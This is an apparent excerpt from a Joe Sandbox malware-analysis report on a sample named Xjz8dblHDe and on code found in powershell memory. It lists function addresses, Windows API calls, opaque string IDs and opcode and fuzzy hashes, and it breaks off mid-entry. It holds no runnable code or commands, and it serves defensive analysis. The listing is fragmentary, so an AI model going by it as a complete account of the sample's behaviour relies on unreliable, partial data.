                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrlen
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 2709904686-1246513382
                                                                    • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                    • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                    • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                    • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                    Function 00405CF2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                    • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                    • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                    • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                    • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

                                                                    Executed Functions

                                                                    Function 07D90FD0 Relevance: .1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7df1b52ddf656245f1a501a53e80c21f2bef114adb381775139c374485c1878e
                                                                    • Instruction ID: 204a259326ffb482911eab3b6f96528ec437054e5d2efb41cf19890b0113b913
                                                                    • Opcode Fuzzy Hash: 7df1b52ddf656245f1a501a53e80c21f2bef114adb381775139c374485c1878e
                                                                    • Instruction Fuzzy Hash: DC2157B130035BABCF68597A8950736FAD6ABC5702F24883AA54EDB291DD77CC408761
                                                                    Function 07D9CAE6 Relevance: 63.9, Strings: 50, Instructions: 1449COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$4']q$4']q$4']q$4']q$4']q$4tl$4tl$tLik$tLik$tLik$tLik$tLik$tLik$x.hk$x.hk$x.hk$-hk$-hk
                                                                    • API String ID: 0-518302100
                                                                    • Opcode ID: 6c81ab379287975965ae17536024ea4f7085035dae84925f5de8f32dcc189170
                                                                    • Instruction ID: 19aedeb7264b5854873d191abf4512dd446b4a2c00a4bdfa0997a71984299651
                                                                    • Opcode Fuzzy Hash: 6c81ab379287975965ae17536024ea4f7085035dae84925f5de8f32dcc189170
                                                                    • Instruction Fuzzy Hash: 46E264B4A00219DFDB24DB54C950BAAF7B2FF85304F1084A9D91AAB751CB31EE85CF61
                                                                    Function 07D9D8C6 Relevance: 43.3, Strings: 34, Instructions: 839COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$4']q$4']q$4']q$tLik$tLik$tLik$tLik$x.hk$x.hk$-hk$-hk
                                                                    • API String ID: 0-3929605641
                                                                    • Opcode ID: 39a30f83cd2be76054ec6ddcb3df867efb9a22b702ec21d186e89a494a16400a
                                                                    • Instruction ID: bee6e45f48081f903e6a37095cb4be2c7ff91bd936010a0a4df63d0a8e7fa551
                                                                    • Opcode Fuzzy Hash: 39a30f83cd2be76054ec6ddcb3df867efb9a22b702ec21d186e89a494a16400a
                                                                    • Instruction Fuzzy Hash: 5E8287B4B01214DFDB64DB54CA90BAAB7B3EF85304F1084A9D81A6B755CB32ED41CFA1
                                                                    Function 07D93ED0 Relevance: 33.6, Strings: 26, Instructions: 1099COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$ml$ml
                                                                    • API String ID: 0-1403971411
                                                                    • Opcode ID: 26fb935680b44d02f698b9ea57b0f77b32ce6c76a72332947af5188b725cc4b5
                                                                    • Instruction ID: b7ee8935edc3ca9e3a5a9285f681286c1c7bc8d15a473bae60cbdc6aa3cbc4ff
                                                                    • Opcode Fuzzy Hash: 26fb935680b44d02f698b9ea57b0f77b32ce6c76a72332947af5188b725cc4b5
                                                                    • Instruction Fuzzy Hash: 79A270B0B10214DFDB24CF68C591BAABBB2EB88704F608569D9166F352CB72DD41CF91
                                                                    Function 07D95E52 Relevance: 33.4, Strings: 26, Instructions: 888COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$4']q$tLik$tLik$x.hk$-hk
                                                                    • API String ID: 0-3903011599
                                                                    • Opcode ID: 1c488fc731aec010b9a2ab18a6dc63ef0ce512801a691e524357befae8a8cef8
                                                                    • Instruction ID: 848d70796417d6fcb5d8f193b3dccc46d8a271778aad10504fd472317db301ce
                                                                    • Opcode Fuzzy Hash: 1c488fc731aec010b9a2ab18a6dc63ef0ce512801a691e524357befae8a8cef8
                                                                    • Instruction Fuzzy Hash: 058282B0A00219DFDB24DB54CA90BAEF7B2AF85304F10C5A9D51A6B755CB31EE81CF61
                                                                    Function 07D95030 Relevance: 30.9, Strings: 24, Instructions: 904COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$4']q$4']q$tLik$x.hk$$]q$$]q$-hk
                                                                    • API String ID: 0-2909761142
                                                                    • Opcode ID: 29be7f1675830a8f7c02b05fe4d4111260de6882f71d7dcebef751fcfcf388f0
                                                                    • Instruction ID: f4a0190b63129a37c6a02ce78bcc1ccf836bef816d3f23fe2c110242ba4e2dd8
                                                                    • Opcode Fuzzy Hash: 29be7f1675830a8f7c02b05fe4d4111260de6882f71d7dcebef751fcfcf388f0
                                                                    • Instruction Fuzzy Hash: D68260B0A00219CFDB24DB54C990BAEF7B2AF85304F50C5A9D51AAB755CB32ED41CF61
                                                                    Function 07D94FDD Relevance: 23.3, Strings: 18, Instructions: 833COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$4']q$tLik$x.hk$-hk
                                                                    • API String ID: 0-1808640163
                                                                    • Opcode ID: d4820284f374bdbd0f22936bfdd6fcabb24f0b0c7f0f9f1bb4cb5045107cfb5b
                                                                    • Instruction ID: b0dedc3612eca3907dad2e17f2fa9292d8c2738f3b35b50a8a13521b1617185c
                                                                    • Opcode Fuzzy Hash: d4820284f374bdbd0f22936bfdd6fcabb24f0b0c7f0f9f1bb4cb5045107cfb5b
                                                                    • Instruction Fuzzy Hash: F9727FB0A00219DFDB24DB54C990BAAF7B2EF85304F10C5A9D51A6B755CB32ED81CF61
                                                                    Function 07D95010 Relevance: 23.3, Strings: 18, Instructions: 830COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$4']q$tLik$x.hk$-hk
                                                                    • API String ID: 0-1808640163
                                                                    • Opcode ID: df7dee8e51ea2065430660a77465ea6558672225a0347cd612d79580bd361d12
                                                                    • Instruction ID: 1bfc5f689978e7f07095d9f4a1ebdf40d0c0211bbf9cfe083fac9bfcef81aba1
                                                                    • Opcode Fuzzy Hash: df7dee8e51ea2065430660a77465ea6558672225a0347cd612d79580bd361d12
                                                                    • Instruction Fuzzy Hash: C27260B0A00219DFDB24DB54C990BAAF7B2EF85304F10C5A9D51A6B795CB32ED81CF61
                                                                    Function 07D9DA8A Relevance: 20.6, Strings: 16, Instructions: 624COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$4']q$tLik$x.hk$-hk
                                                                    • API String ID: 0-259737131
                                                                    • Opcode ID: f21b183e3f5d311a5b54e70a07c21f5a0a7748a913fe8fa422cad905f8615137
                                                                    • Instruction ID: 4e5d59e3fe0e86bef00156b1685ce778c89adaa92be46f1e26563b74f3fe51e4
                                                                    • Opcode Fuzzy Hash: f21b183e3f5d311a5b54e70a07c21f5a0a7748a913fe8fa422cad905f8615137
                                                                    • Instruction Fuzzy Hash: 294286B0B003159FDB24DB54CA90BAAB7B3EF85704F1084A9D91A6B755CB32ED41CFA1
                                                                    Function 07D93EB2 Relevance: 15.9, Strings: 12, Instructions: 884COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$ml
                                                                    • API String ID: 0-408471194
                                                                    • Opcode ID: 122369fadeaddf5c03c37c086aedf907a4cf9e3c8282ec31cb71feda51dfd220
                                                                    • Instruction ID: 52de28a2b7fcb73e85916ff7e0254655dbf70e0c4b60a3aa7da4f625f4f1429d
                                                                    • Opcode Fuzzy Hash: 122369fadeaddf5c03c37c086aedf907a4cf9e3c8282ec31cb71feda51dfd220
                                                                    • Instruction Fuzzy Hash: 438292B0B10214DFDB24CF68C591BAABBB2EB84704F608169D9166F352CB72ED41CF91
                                                                    Function 07D93220 Relevance: 15.6, Strings: 12, Instructions: 641COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.hk$-hk
                                                                    • API String ID: 0-3464176819
                                                                    • Opcode ID: 54b1a3c14d96173d6cfc698dd2b980d7739574f388fa10de8dfd1e5399b5333a
                                                                    • Instruction ID: f2047a8b7e730a098b0c1d9a3a6be2bd4e85fb0bf8de71c27e125d09ef9e52b8
                                                                    • Opcode Fuzzy Hash: 54b1a3c14d96173d6cfc698dd2b980d7739574f388fa10de8dfd1e5399b5333a
                                                                    • Instruction Fuzzy Hash: 3932E3B0B002059FCF289B68C951BAEFBA2EF85314F15847AD5019F3A5CB36DD45CBA1
                                                                    Function 07D91228 Relevance: 11.8, Strings: 9, Instructions: 595COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q
                                                                    • API String ID: 0-3647279530
                                                                    • Opcode ID: 5f3887d7c74004394f3d16d96cebe69aac132af7f8b1b929c276fbacd079381d
                                                                    • Instruction ID: bcafd4defb76526115ae3982c3e6c8c62a00e6e3f700d7ecc43d536f9c7b58b9
                                                                    • Opcode Fuzzy Hash: 5f3887d7c74004394f3d16d96cebe69aac132af7f8b1b929c276fbacd079381d
                                                                    • Instruction Fuzzy Hash: B632BCB0B0120A9FDB14CB58C595BAAFBB2FF85314F148069E9159B391CB72EC45CBA1
                                                                    Function 07D9DD1C Relevance: 11.7, Strings: 9, Instructions: 435COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$4']q$4tl$tLik$x.hk
                                                                    • API String ID: 0-1387054959
                                                                    • Opcode ID: b7527a0e1aebeffe1c457473362f1eca157512393f3c629c2c481e4c9bbea12a
                                                                    • Instruction ID: 91edb1271266e253c8afdcb4e14c1aa191cdb05b29a6c1a02acf6c475e02e6c3
                                                                    • Opcode Fuzzy Hash: b7527a0e1aebeffe1c457473362f1eca157512393f3c629c2c481e4c9bbea12a
                                                                    • Instruction Fuzzy Hash: E5122AB0A00219DFDF74DB24C951BA9F7B2AB45704F0084E9D95AAB750CB32EE85CF61
                                                                    Function 07D9DB11 Relevance: 11.7, Strings: 9, Instructions: 431COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$4']q$4tl$tLik$x.hk
                                                                    • API String ID: 0-1387054959
                                                                    • Opcode ID: 63904fc75c4adfd36f8b2401957994421263ebad8f65f127f8904635b0b9d0bb
                                                                    • Instruction ID: 74f5757082b30bc9d9df6ac679b0cab665cd2d99d245bd18192c9633cb51904f
                                                                    • Opcode Fuzzy Hash: 63904fc75c4adfd36f8b2401957994421263ebad8f65f127f8904635b0b9d0bb
                                                                    • Instruction Fuzzy Hash: 9C123BB0A00219DFDF34DB24C951BA9F7B2BB45704F0084A9D45AAB750CB72EE85CF61
                                                                    Function 096716C8 Relevance: 9.1, Strings: 7, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q
                                                                    • API String ID: 0-3877577046
                                                                    • Opcode ID: a4d6ae7431261d6e109db4da5853382d3a2369614c6596b588ab876432acc1d8
                                                                    • Instruction ID: 56981cf47de93ec73127fda6809481c0d6a0dce44258b495214408070d9dd837
                                                                    • Opcode Fuzzy Hash: a4d6ae7431261d6e109db4da5853382d3a2369614c6596b588ab876432acc1d8
                                                                    • Instruction Fuzzy Hash: 83B10531B0C304DFCB248E68D4516BAFBA6AF86350F16846BE855CF351DB35C946CBA1
                                                                    Function 09673CB0 Relevance: 6.4, Strings: 5, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                    • API String ID: 0-2353078639
                                                                    • Opcode ID: 4234498a304479eac8b454a42f1cc6a0a7ae65862878763e5795744c3b53762a
                                                                    • Instruction ID: 02c0ca3babc4fa9372b6074adf106258dec0779c496773176f20f0b0e0f152b0
                                                                    • Opcode Fuzzy Hash: 4234498a304479eac8b454a42f1cc6a0a7ae65862878763e5795744c3b53762a
                                                                    • Instruction Fuzzy Hash: 32412631B04306CFCB28AF69E595A6AFBE5BF85310B1484BBD855CB321DB31C846DB52
                                                                    Function 09673CAC Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$$]q$$]q
                                                                    • API String ID: 0-3019551829
                                                                    • Opcode ID: 866c81b9d7152d3dc02b5b70039b49e8f2cd028f35a8fa822437d9480545e341
                                                                    • Instruction ID: a0e749597d42ee975f7d849405a942eac204e64c388fd0d621acf22d426062e5
                                                                    • Opcode Fuzzy Hash: 866c81b9d7152d3dc02b5b70039b49e8f2cd028f35a8fa822437d9480545e341
                                                                    • Instruction Fuzzy Hash: 26215B31A00306DFDF28AE59E585E69F7F5AF44751F04816AE8188B321D731C981EF51
                                                                    Function 09671C38 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl
                                                                    • API String ID: 0-2797258600
                                                                    • Opcode ID: 2968ffcb3529efabceede2ce1aa47a0068d4687e7747fed80ec25a89b71cdfff
                                                                    • Instruction ID: 0494160328d9d55f4abc828bcd5605e460cb353e355b73ce91276e5201c8213a
                                                                    • Opcode Fuzzy Hash: 2968ffcb3529efabceede2ce1aa47a0068d4687e7747fed80ec25a89b71cdfff
                                                                    • Instruction Fuzzy Hash: 99914C74A04208DFCB14CF58C595AAABBF2EF89310F16C56AE815AB355CB32DD41CFA1
                                                                    Function 07D90C68 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: tP]q$tP]q
                                                                    • API String ID: 0-145478062
                                                                    • Opcode ID: 46ea22bc4dfe8b3681eb6611f9834432cf9aa10d10ef1f6e182a788bc16853c3
                                                                    • Instruction ID: 5f9a414513c2c482129626d8ffb9e5925624465b0b241245cd074c03825138dd
                                                                    • Opcode Fuzzy Hash: 46ea22bc4dfe8b3681eb6611f9834432cf9aa10d10ef1f6e182a788bc16853c3
                                                                    • Instruction Fuzzy Hash: 665167B170435B9FCF258A69A80076AFBF6AFC2311F18C47BD545CB692CA35D844C7A1
                                                                    Function 09671C33 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl
                                                                    • API String ID: 0-753020189
                                                                    • Opcode ID: cf065b6b692bd35ae2e5e51ea0daa295fe0c916e17cdded03028f10adced9431
                                                                    • Instruction ID: 9b847ca9ee79b8eb147d04a3a1935104098c052a1417046d960ffbf9d762a561
                                                                    • Opcode Fuzzy Hash: cf065b6b692bd35ae2e5e51ea0daa295fe0c916e17cdded03028f10adced9431
                                                                    • Instruction Fuzzy Hash: 39812A74A04204DFCB24CF58C591EA9FBF2EB89314F16815AE915AB355CB32ED41CFA1
                                                                    Function 07D93A58 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: x.hk
                                                                    • API String ID: 0-3394790906
                                                                    • Opcode ID: 0116f62085cf85406c127d194198bd6b94576ccd8201a93dcbe2ddab853e98ee
                                                                    • Instruction ID: e59c8626ca02d8840a0e9b85d4e78730138abe6fd72fe923669e45c7997696d2
                                                                    • Opcode Fuzzy Hash: 0116f62085cf85406c127d194198bd6b94576ccd8201a93dcbe2ddab853e98ee
                                                                    • Instruction Fuzzy Hash: 8931C5B0740204AFDB189B68C955BAEBAA7EFC4354F108425E9016F3A1CF769D058BF5
                                                                    Function 09680468 Relevance: .2, Instructions: 244COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 99d861f42e74ebe5b93c403babb75a70529af8ff3bf29c66273cc1fca7e1bc75
                                                                    • Instruction ID: 5846c5a12ae2c8de59a7db357595f53a2892b83ac0380384182dca5347f22973
                                                                    • Opcode Fuzzy Hash: 99d861f42e74ebe5b93c403babb75a70529af8ff3bf29c66273cc1fca7e1bc75
                                                                    • Instruction Fuzzy Hash: 5291273190A3918FC702DF6CC9A09DA7FB1FF4B210B1945D7D490DB2A3C6259C49CBA6
                                                                    Function 09681DC0 Relevance: .1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 900d509beda5d8300407ae5f666bf2b63f994bf155e63d6cbf9395454031d5c8
                                                                    • Instruction ID: 8efaa6f565b0e149a5ffeeb56f6be88a85029b1eac31078b21b649a909a2c76a
                                                                    • Opcode Fuzzy Hash: 900d509beda5d8300407ae5f666bf2b63f994bf155e63d6cbf9395454031d5c8
                                                                    • Instruction Fuzzy Hash: 38514A70A046098FCB14DF9CC5849AEBBF2FF89320F658658E915A73A4C731EC52CB40
                                                                    Function 09681DB7 Relevance: .1, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
